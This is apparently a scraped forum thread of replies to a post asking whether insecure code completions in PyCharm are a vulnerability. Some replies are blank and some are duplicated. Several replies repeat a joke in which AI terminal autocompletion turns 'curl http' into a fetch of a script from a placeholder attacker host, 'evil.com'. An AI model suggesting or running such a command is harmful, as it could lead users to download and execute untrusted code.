Are insecure code completions in PyCharm a vulnerability?
sethmlarson.dev
Are insecure code completions in PyCharm a vulnerability?
1–10 of 18 posts
Re: Are insecure code completions in PyCharm a vulnerability?
#2And it's the one thing the LLM developers have been trying to fix for the last 2 years. Apparently, even at the cost of some other functionality. It's not like they can do it reliably.
Re: Are insecure code completions in PyCharm a vulnerability?
#3Similar to how using very difficult technologies makes you more likely to create code with vulnerabilities: the technologies are not the vulnerability, but it’s easier to cause them.
Re: Are insecure code completions in PyCharm a vulnerability?
#4Re: Are insecure code completions in PyCharm a vulnerability?
#5See also: https://nocomplexity.github.io/pythonsecurity/fundamentals/w...
Re: Are insecure code completions in PyCharm a vulnerability?
#6Re: Are insecure code completions in PyCharm a vulnerability?
#7 $ curl http
$ curl https://evil.com/run.sh
Then you’re just an enter away from causing havoc on your system.Re: Are insecure code completions in PyCharm a vulnerability?
#8Re: Are insecure code completions in PyCharm a vulnerability?
#9Waiting for the first terminal with AI autocompletion. $ curl http $ curl https://evil.com/run.sh Then you’re just an enter away from causing havoc on your system.
Re: Are insecure code completions in PyCharm a vulnerability?
#10Waiting for the first terminal with AI autocompletion. $ curl http $ curl https://evil.com/run.sh Then you’re just an enter away from causing havoc on your system.